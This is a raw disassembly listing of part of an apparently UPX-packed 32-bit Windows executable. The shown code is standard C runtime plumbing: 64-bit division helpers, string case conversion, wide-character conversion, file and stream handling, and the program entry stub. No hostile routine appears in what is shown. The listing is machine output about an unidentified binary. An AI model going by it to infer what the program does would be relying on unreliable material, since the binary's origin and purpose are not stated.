loc_41D3AA loc_41D36C: ; CODE XREF: sub_41D2B4+70j mov edi, [ebp+var_4] jmp short loc_41D39A ; --------------------------------------------------------------------------- loc_41D371: ; CODE XREF: sub_41D2B4+75j mov eax, [ebp+arg_0] push esi movsx eax, byte ptr [eax] push eax call sub_41F58A pop ecx cmp eax, 0FFFFFFFFh pop ecx jz short loc_41D3B3 inc [ebp+arg_0] mov eax, [esi+18h] dec ebx mov [ebp+arg_C], eax test eax, eax jg short loc_41D39A mov [ebp+arg_C], 1 loc_41D39A: ; CODE XREF: sub_41D2B4+BBj ; sub_41D2B4+DDj test ebx, ebx jnz loc_41D2F2 mov eax, [ebp+arg_8] loc_41D3A5: ; CODE XREF: sub_41D2B4+1Fj ; sub_41D2B4+108j pop edi pop esi pop ebx leave retn ; --------------------------------------------------------------------------- loc_41D3AA: ; CODE XREF: sub_41D2B4+ADj ; sub_41D2B4+B6j or dword ptr [esi+0Ch], 20h mov eax, [ebp+var_4] jmp short loc_41D3B5 ; --------------------------------------------------------------------------- loc_41D3B3: ; CODE XREF: sub_41D2B4+84j ; sub_41D2B4+CFj mov eax, edi loc_41D3B5: ; CODE XREF: sub_41D2B4+FDj sub eax, ebx xor edx, edx div [ebp+arg_4] jmp short loc_41D3A5 sub_41D2B4 endp ; =============== S U B R O U T I N E ======================================= sub_41D3BE proc near ; CODE XREF: sub_416909+8p arg_0 = dword ptr 4 arg_4 = byte ptr 8 push [esp+arg_0] call dword_427098 ; GetFileAttributesA cmp eax, 0FFFFFFFFh jnz short loc_41D3DE call dword_42708C ; RtlGetLastWin32Error push eax call sub_4203DF pop ecx loc_41D3DA: ; CODE XREF: sub_41D3BE+3Fj or eax, 0FFFFFFFFh retn ; --------------------------------------------------------------------------- loc_41D3DE: ; CODE XREF: sub_41D3BE+Dj test al, 1 jz short loc_41D3FF test [esp+arg_4], 2 jz short loc_41D3FF mov ds:dword_4DB958, 0Dh mov ds:dword_4DB95C, 5 jmp short loc_41D3DA ; --------------------------------------------------------------------------- loc_41D3FF: ; CODE XREF: sub_41D3BE+22j ; sub_41D3BE+29j xor eax, eax retn sub_41D3BE endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_41D410 proc near ; CODE XREF: sub_416923+3Fp ; sub_41A98D+24p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch arg_C = dword ptr 10h push ebx push esi mov eax, [esp+8+arg_C] or eax, eax jnz short loc_41D432 mov ecx, [esp+8+arg_8] mov eax, [esp+8+arg_4] xor edx, edx div ecx mov ebx, eax mov eax, [esp+8+arg_0] div ecx mov edx, ebx jmp short loc_41D473 ; --------------------------------------------------------------------------- loc_41D432: ; CODE XREF: sub_41D410+8j mov ecx, eax mov ebx, [esp+8+arg_8] mov edx, [esp+8+arg_4] mov eax, [esp+8+arg_0] loc_41D440: ; CODE XREF: sub_41D410+3Aj shr ecx, 1 rcr ebx, 1 shr edx, 1 rcr eax, 1 or ecx, ecx jnz short loc_41D440 div ebx mov esi, eax mul [esp+8+arg_C] mov ecx, eax mov eax, [esp+8+arg_8] mul esi add edx, ecx jb short loc_41D46E cmp edx, [esp+8+arg_4] ja short loc_41D46E jb short loc_41D46F cmp eax, [esp+8+arg_0] jbe short loc_41D46F loc_41D46E: ; CODE XREF: sub_41D410+4Ej ; sub_41D410+54j dec esi loc_41D46F: ; CODE XREF: sub_41D410+56j ; sub_41D410+5Cj xor edx, edx mov eax, esi loc_41D473: ; CODE XREF: sub_41D410+20j pop esi pop ebx retn 10h sub_41D410 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_41D480 proc near ; CODE XREF: sub_416923+2Dp ; sub_41A98D+3Dp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch arg_C = dword ptr 10h push ebx mov eax, [esp+4+arg_C] or eax, eax jnz short loc_41D4A1 mov ecx, [esp+4+arg_8] mov eax, [esp+4+arg_4] xor edx, edx div ecx mov eax, [esp+4+arg_0] div ecx mov eax, edx xor edx, edx jmp short loc_41D4F1 ; --------------------------------------------------------------------------- loc_41D4A1: ; CODE XREF: sub_41D480+7j mov ecx, eax mov ebx, [esp+4+arg_8] mov edx, [esp+4+arg_4] mov eax, [esp+4+arg_0] loc_41D4AF: ; CODE XREF: sub_41D480+39j shr ecx, 1 rcr ebx, 1 shr edx, 1 rcr eax, 1 or ecx, ecx jnz short loc_41D4AF div ebx mov ecx, eax mul [esp+4+arg_C] xchg eax, ecx mul [esp+4+arg_8] add edx, ecx jb short loc_41D4DA cmp edx, [esp+4+arg_4] ja short loc_41D4DA jb short loc_41D4E2 cmp eax, [esp+4+arg_0] jbe short loc_41D4E2 loc_41D4DA: ; CODE XREF: sub_41D480+4Aj ; sub_41D480+50j sub eax, [esp+4+arg_8] sbb edx, [esp+4+arg_C] loc_41D4E2: ; CODE XREF: sub_41D480+52j ; sub_41D480+58j sub eax, [esp+4+arg_0] sbb edx, [esp+4+arg_4] neg edx neg eax sbb edx, 0 loc_41D4F1: ; CODE XREF: sub_41D480+1Fj pop ebx retn 10h sub_41D480 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_41D500 proc near ; CODE XREF: sub_416A33+5Fp ; sub_416A33+92p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch arg_C = dword ptr 10h push edi push esi push ebx xor edi, edi mov eax, [esp+0Ch+arg_4] or eax, eax jge short loc_41D521 inc edi mov edx, [esp+0Ch+arg_0] neg eax neg edx sbb eax, 0 mov [esp+0Ch+arg_4], eax mov [esp+0Ch+arg_0], edx loc_41D521: ; CODE XREF: sub_41D500+Bj mov eax, [esp+0Ch+arg_C] or eax, eax jge short loc_41D53D inc edi mov edx, [esp+0Ch+arg_8] neg eax neg edx sbb eax, 0 mov [esp+0Ch+arg_C], eax mov [esp+0Ch+arg_8], edx loc_41D53D: ; CODE XREF: sub_41D500+27j or eax, eax jnz short loc_41D559 mov ecx, [esp+0Ch+arg_8] mov eax, [esp+0Ch+arg_4] xor edx, edx div ecx mov ebx, eax mov eax, [esp+0Ch+arg_0] div ecx mov edx, ebx jmp short loc_41D59A ; --------------------------------------------------------------------------- loc_41D559: ; CODE XREF: sub_41D500+3Fj mov ebx, eax mov ecx, [esp+0Ch+arg_8] mov edx, [esp+0Ch+arg_4] mov eax, [esp+0Ch+arg_0] loc_41D567: ; CODE XREF: sub_41D500+71j shr ebx, 1 rcr ecx, 1 shr edx, 1 rcr eax, 1 or ebx, ebx jnz short loc_41D567 div ecx mov esi, eax mul [esp+0Ch+arg_C] mov ecx, eax mov eax, [esp+0Ch+arg_8] mul esi add edx, ecx jb short loc_41D595 cmp edx, [esp+0Ch+arg_4] ja short loc_41D595 jb short loc_41D596 cmp eax, [esp+0Ch+arg_0] jbe short loc_41D596 loc_41D595: ; CODE XREF: sub_41D500+85j ; sub_41D500+8Bj dec esi loc_41D596: ; CODE XREF: sub_41D500+8Dj ; sub_41D500+93j xor edx, edx mov eax, esi loc_41D59A: ; CODE XREF: sub_41D500+57j dec edi jnz short loc_41D5A4 neg edx neg eax sbb edx, 0 loc_41D5A4: ; CODE XREF: sub_41D500+9Bj pop ebx pop esi pop edi retn 10h sub_41D500 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41D5AA proc near ; CODE XREF: sub_4170ED+BFp ; sub_4170ED+12Cp ... var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx mov eax, ds:dword_4DBA14 push ebx xor ebx, ebx cmp eax, ebx mov [ebp+var_4], ebx jnz short loc_41D5DE mov eax, [ebp+arg_0] mov edx, eax cmp [eax], bl jz short loc_41D645 loc_41D5C6: ; CODE XREF: sub_41D5AA+30j mov cl, [edx] cmp cl, 61h jl short loc_41D5D7 cmp cl, 7Ah jg short loc_41D5D7 sub cl, 20h mov [edx], cl loc_41D5D7: ; CODE XREF: sub_41D5AA+21j ; sub_41D5AA+26j inc edx cmp [edx], bl jnz short loc_41D5C6 jmp short loc_41D645 ; --------------------------------------------------------------------------- loc_41D5DE: ; CODE XREF: sub_41D5AA+11j push esi push edi push 1 push ebx push ebx push ebx push 0FFFFFFFFh mov esi, 200h push [ebp+arg_0] push esi push eax call sub_422ACA mov edi, eax add esp, 20h cmp edi, ebx jz short loc_41D637 push edi call sub_41B4D5 cmp eax, ebx pop ecx mov [ebp+var_4], eax jz short loc_41D637 push 1 push ebx push edi push eax push 0FFFFFFFFh push [ebp+arg_0] push esi push ds:dword_4DBA14 call sub_422ACA add esp, 20h test eax, eax jz short loc_41D637 push [ebp+var_4] push [ebp+arg_0] call sub_41BEB0 pop ecx pop ecx loc_41D637: ; CODE XREF: sub_41D5AA+53j ; sub_41D5AA+61j ... push [ebp+var_4] call sub_41B0B1 mov eax, [ebp+arg_0] pop ecx pop edi pop esi loc_41D645: ; CODE XREF: sub_41D5AA+1Aj ; sub_41D5AA+32j pop ebx leave retn sub_41D5AA endp ; =============== S U B R O U T I N E ======================================= sub_41D648 proc near ; CODE XREF: sub_417ADE+1A8p arg_0 = dword ptr 4 cmp dword_43CBE4, 1 jle short loc_41D65F push 4 push [esp+4+arg_0] call sub_41F515 pop ecx pop ecx retn ; --------------------------------------------------------------------------- loc_41D65F: ; CODE XREF: sub_41D648+7j mov eax, [esp+arg_0] mov ecx, off_43C9D8 mov al, [ecx+eax*2] and eax, 4 retn sub_41D648 endp ; =============== S U B R O U T I N E ======================================= sub_41D670 proc near ; CODE XREF: sub_420510+76p ; sub_420510+88p ... arg_0 = dword ptr 4 cmp dword_43CBE4, 1 jle short loc_41D687 push 8 push [esp+4+arg_0] call sub_41F515 pop ecx pop ecx retn ; --------------------------------------------------------------------------- loc_41D687: ; CODE XREF: sub_41D670+7j mov eax, [esp+arg_0] mov ecx, off_43C9D8 mov al, [ecx+eax*2] and eax, 8 retn sub_41D670 endp ; --------------------------------------------------------------------------- align 10h mov eax, [esp+0Ch] test eax, eax jz short locret_41D6EC mov edx, [esp+4] push esi push edi mov esi, edx mov edi, [esp+10h] or edx, edi and edx, 3 jz short loc_41D6ED test eax, 1 jz short loc_41D6CD mov cl, [esi] cmp cl, [edi] jnz short loc_41D71A inc esi inc edi dec eax jz short loc_41D6EA loc_41D6CD: ; CODE XREF: UPX0:0041D6C0j ; UPX0:0041D6E8j mov cl, [esi] mov dl, [edi] cmp cl, dl jnz short loc_41D71A mov cl, [esi+1] mov dl, [edi+1] cmp cl, dl jnz short loc_41D71A add edi, 2 add esi, 2 sub eax, 2 jnz short loc_41D6CD loc_41D6EA: ; CODE XREF: UPX0:0041D6CBj ; UPX0:0041D724j pop edi pop esi locret_41D6EC: ; CODE XREF: UPX0:0041D6A6j retn ; --------------------------------------------------------------------------- loc_41D6ED: ; CODE XREF: UPX0:0041D6B9j mov ecx, eax and eax, 3 shr ecx, 2 jz short loc_41D722 repe cmpsd jz short loc_41D722 mov ecx, [esi-4] mov edx, [edi-4] cmp cl, dl jnz short loc_41D715 cmp ch, dh jnz short loc_41D715 shr ecx, 10h shr edx, 10h cmp cl, dl jnz short loc_41D715 cmp ch, dh loc_41D715: ; CODE XREF: UPX0:0041D703j ; UPX0:0041D707j ... mov eax, 0 loc_41D71A: ; CODE XREF: UPX0:0041D6C6j ; UPX0:0041D6D3j ... sbb eax, eax pop edi sbb eax, 0FFFFFFFFh pop esi retn ; --------------------------------------------------------------------------- loc_41D722: ; CODE XREF: UPX0:0041D6F5j ; UPX0:0041D6F9j test eax, eax jz short loc_41D6EA mov edx, [esi] mov ecx, [edi] cmp dl, cl jnz short loc_41D715 dec eax jz short loc_41D749 cmp dh, ch jnz short loc_41D715 dec eax jz short loc_41D749 and ecx, 0FF0000h and edx, 0FF0000h cmp edx, ecx jnz short loc_41D715 dec eax loc_41D749: ; CODE XREF: UPX0:0041D72Fj ; UPX0:0041D736j pop edi pop esi retn ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41D74C proc near ; CODE XREF: sub_418069+6p ; sub_418087+4Ap ... var_4 = byte ptr -4 var_3 = byte ptr -3 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx cmp ds:dword_4DBA14, 0 push ebx push esi push edi jnz short loc_41D779 mov eax, [ebp+arg_0] cmp eax, 41h jl loc_41D812 cmp eax, 5Ah jg loc_41D812 add eax, 20h jmp loc_41D812 ; --------------------------------------------------------------------------- loc_41D779: ; CODE XREF: sub_41D74C+Ej mov ebx, [ebp+arg_0] mov edi, 100h push 1 cmp ebx, edi pop esi jge short loc_41D7AD cmp dword_43CBE4, esi jle short loc_41D79B push esi push ebx call sub_41F515 pop ecx pop ecx jmp short loc_41D7A5 ; --------------------------------------------------------------------------- loc_41D79B: ; CODE XREF: sub_41D74C+42j mov eax, off_43C9D8 mov al, [eax+ebx*2] and eax, esi loc_41D7A5: ; CODE XREF: sub_41D74C+4Dj test eax, eax jnz short loc_41D7AD loc_41D7A9: ; CODE XREF: sub_41D74C+ADj mov eax, ebx jmp short loc_41D812 ; --------------------------------------------------------------------------- loc_41D7AD: ; CODE XREF: sub_41D74C+3Aj ; sub_41D74C+5Bj mov edx, off_43C9D8 mov eax, ebx sar eax, 8 movzx ecx, al test byte ptr [edx+ecx*2+1], 80h jz short loc_41D7D1 and byte ptr [ebp+arg_0+2], 0 push 2 mov byte ptr [ebp+arg_0], al mov byte ptr [ebp+arg_0+1], bl pop eax jmp short loc_41D7DA ; --------------------------------------------------------------------------- loc_41D7D1: ; CODE XREF: sub_41D74C+74j and byte ptr [ebp+arg_0+1], 0 mov byte ptr [ebp+arg_0], bl mov eax, esi loc_41D7DA: ; CODE XREF: sub_41D74C+83j push esi push 0 lea ecx, [ebp+var_4] push 3 push ecx push eax lea eax, [ebp+arg_0] push eax push edi push ds:dword_4DBA14 call sub_422ACA add esp, 20h test eax, eax jz short loc_41D7A9 cmp eax, esi jnz short loc_41D805 movzx eax, [ebp+var_4] jmp short loc_41D812 ; --------------------------------------------------------------------------- loc_41D805: ; CODE XREF: sub_41D74C+B1j movzx eax, [ebp+var_3] movzx ecx, [ebp+var_4] shl eax, 8 or eax, ecx loc_41D812: ; CODE XREF: sub_41D74C+16j ; sub_41D74C+1Fj ... pop edi pop esi pop ebx leave retn sub_41D74C endp ; =============== S U B R O U T I N E ======================================= sub_41D817 proc near ; CODE XREF: sub_4185A5+ADp ; sub_419594+55p ... arg_0 = dword ptr 4 mov ecx, [esp+arg_0] cmp word ptr [ecx], 0 lea eax, [ecx+2] jz short loc_41D82E loc_41D824: ; CODE XREF: sub_41D817+15j mov dx, [eax] inc eax inc eax test dx, dx jnz short loc_41D824 loc_41D82E: ; CODE XREF: sub_41D817+Bj sub eax, ecx sar eax, 1 dec eax retn sub_41D817 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41D834 proc near ; CODE XREF: sub_4185A5+7Fp ; sub_4185A5+90p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp mov edx, [ebp+arg_0] push ebx push esi xor esi, esi xor eax, eax cmp edx, esi push edi jz loc_41D901 mov edi, [ebp+arg_8] cmp edi, esi jz loc_41D92E cmp ds:dword_4DBA14, esi jnz short loc_41D885 cmp edi, esi jbe loc_41D92E loc_41D864: ; CODE XREF: sub_41D834+4Aj mov ecx, [ebp+arg_4] add ecx, eax movzx si, byte ptr [ecx] mov [edx], si cmp byte ptr [ecx], 0 jz loc_41D92E inc eax inc edx inc edx cmp eax, edi jb short loc_41D864 jmp loc_41D92E ; --------------------------------------------------------------------------- loc_41D885: ; CODE XREF: sub_41D834+26j mov ebx, [ebp+arg_4] mov esi, dword_427180 push edi push edx push 0FFFFFFFFh push ebx push 9 push ds:dword_4DBA24 call esi ; MultiByteToWideChar test eax, eax jnz loc_41D92D call dword_42708C ; RtlGetLastWin32Error cmp eax, 7Ah jz short loc_41D8BF loc_41D8B0: ; CODE XREF: sub_41D834+CBj ; sub_41D834+F7j mov ds:dword_4DB958, 2Ah or eax, 0FFFFFFFFh jmp short loc_41D92E ; --------------------------------------------------------------------------- loc_41D8BF: ; CODE XREF: sub_41D834+7Aj lea ecx, [edi-1] mov eax, ebx mov [ebp+arg_4], ecx loc_41D8C7: ; CODE XREF: sub_41D834+B3j mov cl, [eax] test cl, cl jz short loc_41D8E9 mov edx, off_43C9D8 movzx ecx, cl test byte ptr [edx+ecx*2+1], 80h jz short loc_41D8DE inc eax loc_41D8DE: ; CODE XREF: sub_41D834+A7j mov ecx, [ebp+arg_4] inc eax dec [ebp+arg_4] test ecx, ecx jnz short loc_41D8C7 loc_41D8E9: ; CODE XREF: sub_41D834+97j push edi sub eax, ebx push [ebp+arg_0] push eax push ebx push 1 push ds:dword_4DBA24 call esi ; MultiByteToWideChar test eax, eax jnz short loc_41D92E jmp short loc_41D8B0 ; --------------------------------------------------------------------------- loc_41D901: ; CODE XREF: sub_41D834+Fj cmp ds:dword_4DBA14, esi jnz short loc_41D914 push [ebp+arg_4] call sub_41AFE0 pop ecx jmp short loc_41D92E ; --------------------------------------------------------------------------- loc_41D914: ; CODE XREF: sub_41D834+D3j push esi push esi push 0FFFFFFFFh push [ebp+arg_4] push 9 push ds:dword_4DBA24 call dword_427180 ; MultiByteToWideChar cmp eax, esi jz short loc_41D8B0 loc_41D92D: ; CODE XREF: sub_41D834+6Bj dec eax loc_41D92E: ; CODE XREF: sub_41D834+1Aj ; sub_41D834+2Aj ... pop edi pop esi pop ebx pop ebp retn sub_41D834 endp ; --------------------------------------------------------------------------- loc_41D933: ; CODE XREF: UPX1:004DF3F4j push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_427718 push offset sub_4234B8 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 58h push ebx push esi push edi mov [ebp-18h], esp call dword_4271B0 ; GetVersion xor edx, edx mov dl, ah mov ds:dword_4DB970, edx mov ecx, eax and ecx, 0FFh mov ds:dword_4DB96C, ecx shl ecx, 8 add ecx, edx mov ds:dword_4DB968, ecx shr eax, 10h mov ds:dword_4DB964, eax xor esi, esi push esi call sub_41DDD2 pop ecx test eax, eax jnz short loc_41D99F push 1Ch call sub_41DA4E pop ecx loc_41D99F: ; CODE XREF: UPX0:0041D995j mov [ebp-4], esi call sub_423302 call dword_4271AC ; GetCommandLineA mov ds:dword_4DCFEC, eax call sub_4231D0 mov ds:dword_4DB9C8, eax call sub_422F83 call sub_422ECA call sub_41B784 mov [ebp-30h], esi lea eax, [ebp-5Ch] push eax call dword_4271A8 ; GetStartupInfoA call sub_422E72 mov [ebp-64h], eax test byte ptr [ebp-30h], 1 jz short loc_41D9EC movzx eax, word ptr [ebp-2Ch] jmp short loc_41D9EF ; --------------------------------------------------------------------------- loc_41D9EC: ; CODE XREF: UPX0:0041D9E4j push 0Ah pop eax loc_41D9EF: ; CODE XREF: UPX0:0041D9EAj push eax push dword ptr [ebp-64h] push esi push esi call dword_42709C ; GetModuleHandleA push eax call sub_401221 mov [ebp-60h], eax push eax call sub_41B7B1 mov eax, [ebp-14h] mov ecx, [eax] mov ecx, [ecx] mov [ebp-68h], ecx push eax push ecx call sub_422CEE pop ecx pop ecx retn ; --------------------------------------------------------------------------- mov esp, [ebp-18h] push dword ptr [ebp-68h] call sub_41B7C2 ; =============== S U B R O U T I N E ======================================= sub_41DA29 proc near ; CODE XREF: sub_41D052+16p ; sub_422ECA+4Ep ... arg_0 = dword ptr 4 cmp ds:dword_4DB9D0, 1 jnz short loc_41DA37 call sub_423590 loc_41DA37: ; CODE XREF: sub_41DA29+7j push [esp+arg_0] call sub_4235C9 push 0FFh call off_43A9A0 pop ecx pop ecx retn sub_41DA29 endp ; =============== S U B R O U T I N E ======================================= sub_41DA4E proc near ; CODE XREF: UPX0:0041D999p arg_0 = dword ptr 4 cmp ds:dword_4DB9D0, 1 jnz short loc_41DA5C call sub_423590 loc_41DA5C: ; CODE XREF: sub_41DA4E+7j push [esp+arg_0] call sub_4235C9 pop ecx push 0FFh call dword_427064 ; ExitProcess retn sub_41DA4E endp ; =============== S U B R O U T I N E ======================================= sub_41DA72 proc near ; CODE XREF: sub_41B05B+2Ap ; sub_423A33+290p arg_0 = dword ptr 4 push ebx push ebp push esi push edi mov edi, [esp+10h+arg_0] cmp edi, ds:dword_4DCDA0 jnb loc_41DB0C mov eax, edi mov esi, edi sar eax, 5 and esi, 1Fh lea ebx, ds:4DCCA0h[eax*4] shl esi, 3 mov eax, [ebx] test byte ptr [eax+esi+4], 1 jz short loc_41DB0C push edi call sub_4238A2 cmp eax, 0FFFFFFFFh pop ecx jz short loc_41DAEB cmp edi, 1 jz short loc_41DAB9 cmp edi, 2 jnz short loc_41DACF loc_41DAB9: ; CODE XREF: sub_41DA72+40j push 2 call sub_4238A2 push 1 mov ebp, eax call sub_4238A2 pop ecx cmp eax, ebp pop ecx jz short loc_41DAEB loc_41DACF: ; CODE XREF: sub_41DA72+45j push edi call sub_4238A2 pop ecx push eax call dword_427068 ; CloseHandle test eax, eax jnz short loc_41DAEB call dword_42708C ; RtlGetLastWin32Error mov ebp, eax jmp short loc_41DAED ; --------------------------------------------------------------------------- loc_41DAEB: ; CODE XREF: sub_41DA72+3Bj ; sub_41DA72+5Bj ... xor ebp, ebp loc_41DAED: ; CODE XREF: sub_41DA72+77j push edi call sub_423828 mov eax, [ebx] pop ecx and byte ptr [eax+esi+4], 0 test ebp, ebp jz short loc_41DB08 push ebp call sub_4203DF pop ecx jmp short loc_41DB1D ; --------------------------------------------------------------------------- loc_41DB08: ; CODE XREF: sub_41DA72+8Bj xor eax, eax jmp short loc_41DB20 ; --------------------------------------------------------------------------- loc_41DB0C: ; CODE XREF: sub_41DA72+Ej ; sub_41DA72+2Fj and ds:dword_4DB95C, 0 mov ds:dword_4DB958, 9 loc_41DB1D: ; CODE XREF: sub_41DA72+94j or eax, 0FFFFFFFFh loc_41DB20: ; CODE XREF: sub_41DA72+98j pop edi pop esi pop ebp pop ebx retn sub_41DA72 endp ; =============== S U B R O U T I N E ======================================= sub_41DB25 proc near ; CODE XREF: sub_41B05B+22p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] mov eax, [esi+0Ch] test al, 83h jz short loc_41DB4E test al, 8 jz short loc_41DB4E push dword ptr [esi+8] call sub_41B0B1 and word ptr [esi+0Ch], 0FBF7h xor eax, eax pop ecx mov [esi], eax mov [esi+8], eax mov [esi+4], eax loc_41DB4E: ; CODE XREF: sub_41DB25+Aj ; sub_41DB25+Ej pop esi retn sub_41DB25 endp ; =============== S U B R O U T I N E ======================================= sub_41DB50 proc near ; CODE XREF: sub_41DBF0+2Dp ; sub_41DBF0+48p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] test esi, esi jnz short loc_41DB62 push esi call sub_41DBF0 pop ecx pop esi retn ; --------------------------------------------------------------------------- loc_41DB62: ; CODE XREF: sub_41DB50+7j push esi call sub_41DB8B test eax, eax pop ecx jz short loc_41DB72 or eax, 0FFFFFFFFh pop esi retn ; --------------------------------------------------------------------------- loc_41DB72: ; CODE XREF: sub_41DB50+1Bj test byte ptr [esi+0Dh], 40h jz short loc_41DB87 push dword ptr [esi+10h] call sub_4238DF neg eax pop ecx pop esi sbb eax, eax retn ; --------------------------------------------------------------------------- loc_41DB87: ; CODE XREF: sub_41DB50+26j xor eax, eax pop esi retn sub_41DB50 endp ; =============== S U B R O U T I N E ======================================= sub_41DB8B proc near ; CODE XREF: sub_41B05B+1Ap ; sub_41D1EC+37p ... arg_0 = dword ptr 4 push ebx push esi mov esi, [esp+8+arg_0] xor ebx, ebx push edi mov eax, [esi+0Ch] mov ecx, eax and ecx, 3 cmp cl, 2 jnz short loc_41DBD8 test ax, 108h jz short loc_41DBD8 mov eax, [esi+8] mov edi, [esi] sub edi, eax test edi, edi jle short loc_41DBD8 push edi push eax push dword ptr [esi+10h] call sub_42291D add esp, 0Ch cmp eax, edi jnz short loc_41DBD1 mov eax, [esi+0Ch] test al, 80h jz short loc_41DBD8 and al, 0FDh mov [esi+0Ch], eax jmp short loc_41DBD8 ; --------------------------------------------------------------------------- loc_41DBD1: ; CODE XREF: sub_41DB8B+36j or dword ptr [esi+0Ch], 20h or ebx, 0FFFFFFFFh loc_41DBD8: ; CODE XREF: sub_41DB8B+14j ; sub_41DB8B+1Aj ... mov eax, [esi+8] and dword ptr [esi+4], 0 mov [esi], eax pop edi mov eax, ebx pop esi pop ebx retn sub_41DB8B endp ; =============== S U B R O U T I N E ======================================= sub_41DBE7 proc near ; CODE XREF: sub_4239DBp push 1 call sub_41DBF0 pop ecx retn sub_41DBE7 endp ; =============== S U B R O U T I N E ======================================= sub_41DBF0 proc near ; CODE XREF: sub_41DB50+Ap ; sub_41DBE7+2p arg_0 = dword ptr 4 push ebx push esi push edi xor esi, esi xor ebx, ebx xor edi, edi cmp ds:dword_4DCC80, esi jle short loc_41DC4E loc_41DC01: ; CODE XREF: sub_41DBF0+5Cj mov eax, ds:dword_4DBC78 mov eax, [eax+esi*4] test eax, eax jz short loc_41DC45 mov ecx, [eax+0Ch] test cl, 83h jz short loc_41DC45 cmp [esp+0Ch+arg_0], 1 jnz short loc_41DC2B push eax call sub_41DB50 cmp eax, 0FFFFFFFFh pop ecx jz short loc_41DC45 inc ebx jmp short loc_41DC45 ; --------------------------------------------------------------------------- loc_41DC2B: ; CODE XREF: sub_41DBF0+2Aj cmp [esp+0Ch+arg_0], 0 jnz short loc_41DC45 test cl, 2 jz short loc_41DC45 push eax call sub_41DB50 cmp eax, 0FFFFFFFFh pop ecx jnz short loc_41DC45 or edi, eax loc_41DC45: ; CODE XREF: sub_41DBF0+1Bj ; sub_41DBF0+23j ... inc esi cmp esi, ds:dword_4DCC80 jl short loc_41DC01 loc_41DC4E: ; CODE XREF: sub_41DBF0+Fj cmp [esp+0Ch+arg_0], 1 mov eax, ebx jz short loc_41DC59 mov eax, edi loc_41DC59: ; CODE XREF: sub_41DBF0+65j pop edi pop esi pop ebx retn sub_41DBF0 endp ; =============== S U B R O U T I N E ======================================= sub_41DC5D proc near ; CODE XREF: sub_41DC8A+136p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push 0 and dword ptr [esi], 0 call dword_42709C ; GetModuleHandleA cmp word ptr [eax], 5A4Dh jnz short loc_41DC88 mov ecx, [eax+3Ch] test ecx, ecx jz short loc_41DC88 add eax, ecx mov cl, [eax+1Ah] mov [esi], cl mov al, [eax+1Bh] mov [esi+1], al loc_41DC88: ; CODE XREF: sub_41DC5D+15j ; sub_41DC5D+1Cj pop esi retn sub_41DC5D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41DC8A proc near ; CODE XREF: sub_41DDD2+20p var_122C = byte ptr -122Ch var_19C = byte ptr -19Ch var_98 = dword ptr -98h var_94 = dword ptr -94h var_88 = dword ptr -88h var_4 = byte ptr -4 push ebp mov ebp, esp mov eax, 122Ch call sub_41BB20 lea eax, [ebp+var_98] push ebx push eax mov [ebp+var_98], 94h call dword_4270C8 ; GetVersionExA test eax, eax jz short loc_41DCCD cmp [ebp+var_88], 2 jnz short loc_41DCCD cmp [ebp+var_94], 5 jb short loc_41DCCD push 1 pop eax jmp loc_41DDCF ; --------------------------------------------------------------------------- loc_41DCCD: ; CODE XREF: sub_41DC8A+27j ; sub_41DC8A+30j ... lea eax, [ebp+var_122C] push 1090h push eax push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT" call dword_4271B4 ; GetEnvironmentVariableA test eax, eax jz loc_41DDBC xor ebx, ebx lea ecx, [ebp+var_122C] cmp [ebp+var_122C], bl jz short loc_41DD0F loc_41DCFC: ; CODE XREF: sub_41DC8A+83j mov al, [ecx] cmp al, 61h jl short loc_41DD0A cmp al, 7Ah jg short loc_41DD0A sub al, 20h mov [ecx], al loc_41DD0A: ; CODE XREF: sub_41DC8A+76j ; sub_41DC8A+7Aj inc ecx cmp [ecx], bl jnz short loc_41DCFC loc_41DD0F: ; CODE XREF: sub_41DC8A+70j lea eax, [ebp+var_122C] push 16h push eax push offset a__global_heap_ ; "__GLOBAL_HEAP_SELECTED" call sub_41BE70 add esp, 0Ch test eax, eax jnz short loc_41DD31 lea eax, [ebp+var_122C] jmp short loc_41DD7A ; --------------------------------------------------------------------------- loc_41DD31: ; CODE XREF: sub_41DC8A+9Dj lea eax, [ebp+var_19C] push 104h push eax push ebx call dword_427070 ; GetModuleFileNameA cmp [ebp+var_19C], bl lea ecx, [ebp+var_19C] jz short loc_41DD65 loc_41DD52: ; CODE XREF: sub_41DC8A+D9j mov al, [ecx] cmp al, 61h jl short loc_41DD60 cmp al, 7Ah jg short loc_41DD60 sub al, 20h mov [ecx], al loc_41DD60: ; CODE XREF: sub_41DC8A+CCj ; sub_41DC8A+D0j inc ecx cmp [ecx], bl jnz short loc_41DD52 loc_41DD65: ; CODE XREF: sub_41DC8A+C6j lea eax, [ebp+var_19C] push eax lea eax, [ebp+var_122C] push eax call sub_41B900 pop ecx pop ecx loc_41DD7A: ; CODE XREF: sub_41DC8A+A5j cmp eax, ebx jz short loc_41DDBC push 2Ch push eax call sub_41BFB0 pop ecx cmp eax, ebx pop ecx jz short loc_41DDBC inc eax mov ecx, eax cmp [eax], bl jz short loc_41DDA1 loc_41DD93: ; CODE XREF: sub_41DC8A+115j cmp byte ptr [ecx], 3Bh jnz short loc_41DD9C mov [ecx], bl jmp short loc_41DD9D ; --------------------------------------------------------------------------- loc_41DD9C: ; CODE XREF: sub_41DC8A+10Cj inc ecx loc_41DD9D: ; CODE XREF: sub_41DC8A+110j cmp [ecx], bl jnz short loc_41DD93 